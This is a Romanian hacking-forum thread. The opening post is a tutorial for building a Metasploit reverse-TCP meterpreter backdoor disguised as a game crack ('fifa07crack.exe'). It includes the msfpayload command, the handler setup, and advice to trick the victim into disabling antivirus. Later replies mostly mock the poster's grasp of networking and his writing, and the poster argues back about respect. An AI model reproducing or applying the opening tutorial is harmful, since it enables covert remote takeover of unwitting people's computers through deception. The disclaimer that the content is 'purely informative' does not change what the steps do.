Jump to content
Cyb3rGhost

Crearea unui mic Backdoor pentru un atac de tip Remote Desktop

Recommended Posts

Informatiile primite in acest tutorial sunt pur informative! Sunteti total resposabili de cum folositi ce ati vazut aici.

In primul rand ca sa nu se prinda victima trebuie sa-i spuneti ca este un crack pentru un joc sau asa ceva si trebuie sa isi dezactiveze antivirusul pt ca o sa fie o alarma falsa :)) ...vedeti voi ca sunteti baieti destepti. Eu ma voi folosi de o distributie linux...dar gata cu vorbaria si la treaba!

Pasul 1: Deschidem un terminal si apoi scriem: msfconsole

Pasul 2: Ne vom folosi de : use multi/handler

Pasul 3: Acum alegem calea unde sa se salveze backdoor-ul nostru, eu voi folosi asa :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 x > /root/Desktop/fifa07crack.exe

Unde 192.168.1.2 este ip-ul vostru! Si 8080 portul...

Pasul 4 : Setam LHOST cu IP-ul nostru! : set LHOST 192.168.1.2

Pasul 5 : Setam portul : set LPORT 8080

Pasul 6 : "Scriem comanda" : exploit

Si cam atat a fost...acum nu va ramane decat sa asteptati ca victima sa dea deschida executabilul de la voi!

Link to comment
Share on other sites

Really? Tu nu ai habar macar care e diferenta dintre LHOST si RHOST, in afara de definitiile de pe Google, dar faci tutoriale de "hacking". Pacat, ce s-a ajuns pe aici, inainte definitia de hacking insemna cu totul si cu totul altceva si era inteleasa, nu ca acum.

a8b41efcf1a77678111b784619907829e78f1c480aebf66ae0bb13aba2238d1b.jpg

Link to comment
Share on other sites

Heyyy @Cyb3rGhost ia uita-te si pe aici:

Una cu una fac doua, dar tutorialul acesta pare luat dintr-un videoclip de pe youtube, baiatul sunt sigur ca "distributia" lui de linux este defapt backtrack care este folosita de toti copilasii care sunt hackeri pe principiu "am backtrack sunt hacker"

Daca nu este asa, ia spune-mi si mie pasii de instalare a "msfconsole", si cum se numeste mai exact "msfconsole"

Link to comment
Share on other sites

In primul rand nu sunt Hacker si nu ma consider unul...il al doilea rand nu cred ar trebui sa ma caracterizeze cineva....eu nu am jignit pe nimeni si nici nu am de gand asa ca nu vrea ca cineva sa mai imi vorbeasca aiurea..nu sunt eu cine stie ce insa am dreptul sa nu imi vorbeasca nimeni urat...vorba aceea... Daca vrei respect Ofera resspect...nu zic asta ca sa ma dau inteligent insa totusi.....Si NU...nu e luat de pe YouTube.........nu cred ca cineva poate intui sau nu cunostintele cuiva....daca cineva e mai bine pregatit decat altul DA dar nu cred ca o anumita persoana o poate caracteriza pe alta.....

Link to comment
Share on other sites

  • Active Members

La pasul 4 nu sunt dumerit, explica-mi mai detaliat te rog.

PS: din ce stiu eu, pe comunitatea asta si in viata in general, respectul se castiga. Nu se cere. Nu te milogi, nu te va respecta nimeni aici daca nu dai motive sa fii respectat.

Link to comment
Share on other sites

SynTAX...nu ma milogesc...nu fac asta insa eu nu am jignit pe nimeni si cred ca am dreptul sa nu fiu jignit sau luat la misto pt ca nici eu nu am luat peste picior pe nimeni..iar legat de pasul 4.....hmmmm...cum sa explic mai pe scurt?.....setam localhost-ul......adica asta inlesneste legatura creata intre PC-ul meu de exemplu si al victimei.......IP-ul ala e un fel de punte creata intre mine si victima sa zic asa....IP-ul este puntea si portul 8080 este stalpul ce sustine puntea :D ....nu prea ma pricep sa explic dar cred ca ai inteles ideea.... :D

Si Castiel mai usor cu injuratul.....calm ca eu nu ti-am zis nimic.... ;)

Edited by Cyb3rGhost
Link to comment
Share on other sites

  • Active Members

<?php
$mesaj="SynTAX...nu ma milogesc...nu fac asta insa eu nu am jignit pe nimeni si cred ca am dreptul sa nu fiu jignit sau luat la misto pt ca nici eu nu am luat peste picior pe nimeni..iar legat de pasul 4.....hmmmm...cum sa explic mai pe scurt?.....setam localhost-ul......adica asta inlesneste legatura creata intre PC-ul meu de exemplu si al victimei.......IP-ul ala e un fel de punte creata intre mine si victima sa zic asa....nu prea ma pricep sa explic dar cred ca ai inteles ideea....

Si Castiel mai usor cu injuratul.....calm ca eu nu ti-am zis nimic.... ;)";
if(substr_count($mesaj,".")>10)
echo "Punctul intr-o propozitie se foloseste doar la sfarsitul unei fraze , pentru a marca o suspensie folosesc doar 3 puncte";
else
echo "Mai invata despre retelistica explicatia ta despre IP este aberanta.";
?>

Edited by danyweb09
nu te-am jignit baros
Link to comment
Share on other sites

Eu zic asa, decat sa continuam cu circul asta care nu foloseste nimanui mai bine la POST-urile mele sau unde comentez cui nu-i convine ce spun sa nu ma mai bage in seama. Accept critici normal insa in limita bunului simt ca asa e corect nu sa ne luam peste picior pt ca nimanui nu-i convine situatia asta. Si cineva care jigneste prin treaba asta nu dovedeste inteligenta ci mai de graba CRETINISM. Si nu am batut niciun apropo prin asta ci am spus asa in general..... :)

Link to comment
Share on other sites

Critici normale.

1. Înva?? s? scrii corect. M? doare capul dup? ce încerc s? citesc un text de acest gen.

2. Semnele de punctua?ie au rolul lor, deci conteaz? enorm ?i nu sunt op?ionale, decât dac? atragi aten?ia ?i vezi c? omul e str?in sau nu a mai stat în România (cazuri mai rare, totu?i).

3. LOGICA este foarte foarte important? dac? vrei s? ai vreo ?ans? în acest vast domeniu. A ta lipse?te cu des?vâr?ire. Sari de la un subiect la altul ?i nimeni nu mai în?elege ce ai vrut s? scrii. Po?i citi din nou înainte de a da publish. La început î?i va fi mai greu, dar apoi te vei obi?nui s? scrii pe paragrafe ?i s? fii ok. O s? vezi c? b?ie?ii nu o s? se mai ia de tine apoi, aka vei primi respectul pe care îl vrei, de?i nu-l meri?i, nu momentan.

4. Nu te-a jignit absolut nimeni, ci doar ?i-ai luat un du? rece, iar peste 5 ani î?i vei aminti în sinea ta c? ?i-a prins bine, de?i n-o s? recuno?ti nim?nui asta, s? te gânde?ti c? un topic de genul a avut un rol important în formarea ta mai normal?.

5. Nu te poate lumea ignora. Forumul e format din to?i membrii, iar dac? 10-100 spun de altul c? nu e ok, atunci el va zbura mai devreme sau mai târziu, ?i asta pentru c?: Î?i place RST? Da. Crezi c? e fain? comunitatea? Da. P?i atunci e a?a pentru membrii ??tia care o între?in la un nivel mai ridicat.

6. Partea tehnic? las? foarte mult de dorit. Insi?ti c? nu e?ti hacker, dar f?când asta deja pierzi mult timp ?i insi?ti exact pe asta dând dovad? de faptul c? ai auzit tu la un prieten c? e ok s? fii ?i modest.

PS: Nu e nevoie s? r?spunzi, doar ia-l ca critic? constructiv?.

Link to comment
Share on other sites

@Cyb3rGhost RST este o comunitate. Fiecare dintre noi evoluam prin informatiile pe care le primim de la ceilalti. In thread-ul asta ai primit multe sfaturi bune si ar trebui sa apreciezi treaba asta. Ia o pauza cateva zile de la postat si aprofundeaza ce au zis baietii mai sus. Faptul ca cineva isi rupe cateva minute din timpul sau ca sa iti dea tie niste sfaturi bune, e o chestie frumoasa.

Tutorialul tau nu are public. Nu foloseste nimanui. Cei care stiu ce este metasploit, au trecut de mult prin "abecedarul" tau. Cei care nu au auzit de metasploit, nu stiu ce este msfconsole, LPORT, RPORT, payload etc. Ei nu inteleg ce se petrece in spate. E ca si cum unii dintre noi am fi la gradinita si unii la liceu. Pentru unii sunt prea multe informatii, iar pentru altii nici macar nu sunt informatii.

Invata chestiiile elementare, citeste tutoriale, cauta surse de informatii si apreciaza sfaturile primite.

Link to comment
Share on other sites

Nu e vorba sa invat eu chestiile elementare hat.me insa ma gandeam ca poate cuiva o sa-i prinda bine. Dupa cum am mai zis, cine vrea citeste si alte chestii si cine nu vrea poate sa treaca mai departe. Si legat de treaba cu semnele de punctuatie si alte treburi de genul asta, nu cred ca trebuie cineva de aici sa ma educe chiar daca are intentii bune.... ;)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...